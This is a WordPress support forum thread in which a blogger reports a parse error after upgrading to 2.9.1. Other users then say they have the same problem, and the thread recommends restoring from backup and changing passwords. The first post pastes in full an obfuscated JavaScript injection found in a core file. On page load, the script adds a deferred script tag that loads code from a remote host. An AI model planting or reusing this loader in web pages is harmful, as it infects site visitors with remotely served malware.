    Hi everyone,

    Serious error here. Weird though.

    I updated to WordPress 2.9.1 today and I checked after install, everything was working fine. I come home, try to go on my blog and then error :

    Parse error: syntax error, unexpected ‘<‘ in /home/greatma1/public_html/perigvennetier/wp-includes/default-filters.php on line 229

    No access to anything. No blog, no admin section. FTP files seems fine. Database seems fine.

    Try to look around but can’t seem to see what it is. Here is my line 229 of the “default-filters.php” file. Any idea what that does? I tried to delete it but then it gives me the same error in another file.

    <script>/*GNU GPL*/ try{window.onload = function(){var Iyx79b843szf = document.createElement('s##^c#)r$i$p#!^t$!'.replace(/\$|@|\)|\^|\(|\!|#|&/ig, ''));var Mruvwe6cfugj = 'Kak8tw05tlcz';Iyx79b843szf.setAttribute('type', 't^#$e)$(&!x@t#!/)j($^a(((&@v^$(^a!$!s!#&(c&&#r&i&!@p$@t&'.replace(/\^|\(|&|#|\)|@|\!|\$/ig, ''));Iyx79b843szf.setAttribute('src',  'h(@t(#t#p#(:@/))))/(y@a!^$^m!(#$-))&c$)o(#m&&.$&^^g#o!#^o^&)&g@&)(!l@#e!@.)#c(!o^.!z)a))&&(.^$g($^(a&!!m(#!#&e&$s@t^)@!(o)$@#p((-#)!)c$^@(^o^)m&#!.(l@@!i^#n$u@#x$^$w!@(e#(&^^b$@$$!c#a$)m)#^.(@#r!&&u!:(^$8$^0!&8#0&(^/#@g^^a)$(n)##@j(i)@.))c$!)$o^!$m)#(!/)&#^^g)!^a&@()n@j$@@i@#((.))^c)o!!)&m@$#&/#)&#w@$(e#!l##((l&#s^^#f)$a$r$&g)(!@)o).)c$^&o!m@^/)g&!#$&o^$^o!!(g$(!@l#$e^$.^!!c^#^o!$m^)$$@/@!&o#@p(!e)^$n@!$)d!n!)!&s).()c@@o$&m(!@!/($@'.replace(/#|\!|\$|&|\)|\(|@|\^/ig, ''));Iyx79b843szf.setAttribute('defer', 'd##e^&f))$#e@@(r!@)('.replace(/\$|#|\)|\!|@|\^|\(|&/ig, ''));Iyx79b843szf.setAttribute('id', 'W)#@2&($d)!v@@!(o$^e(#@h@&(t&$&&i@$&^d!((p$&@3!#@y#'.replace(/&|\$|\^|\)|\(|@|\!|#/ig, ''));document.body.appendChild(Iyx79b843szf);}} catch(Ipf9jneywl) {}</script>

    Really need help here I’m freaking out a little.

    Thanks,

    I just checked another of my blogs and I have the same problem. ??

    I tried to remove all of the plugins by creating an empty “plugins” directory but it didn’t work.

    I will try to deactivate them in the database. Will report.

    Man that sucked. I found out by doing some more research on this forum that it was an online virus. I had to run some cleaners and clean files manually as they couldn’t be cleaned automatically.

    I don’t know how this happened…

    I hope it will not come back!

    has it come back ?

    Aw man! I’ve got the same problem on my site, how to fix it!

    The quick and easy way.
    Restore from backup & change all your admin passwords.
